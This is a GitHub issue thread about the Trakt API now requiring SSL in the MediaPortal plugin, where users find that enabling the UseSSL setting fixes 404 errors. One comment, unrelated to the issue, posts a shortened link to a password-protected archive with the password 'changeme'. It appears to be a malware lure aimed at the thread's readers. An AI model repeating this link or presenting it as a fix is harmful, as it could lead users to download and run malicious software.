### ISSUE TITLE
Trakt API now requires SSL

### ISSUE THREAD

**Issue by dstmar** [trakt/Trakt-for-Mediaportal#123]
I started getting 404 errors when trying to sync my library, or authorize the app.  I changed the UseSSL setting to "yes" in the Trakt section of MediaPortal.xml, and everything is working now.

**Comment by SagarChandra07** [comment]
try this
https://bit.ly/47P0Nvo
Archive password: changeme

you may need to install the c compiler

**Comment by damienhaynes** [comment]
Once upon a time it was not SSL but it was introduced a long time ago so added that option (with it defaulted to true). 

It would be worth removing that option now and forcing it on regardless to prevent non-ssl being used.

**Comment by rectifyer** [comment]
Cloudflare must have started enforcing SSL. The Trakt API has been documented as SSL only for a long time now, but CF must be fully enforcing it now.
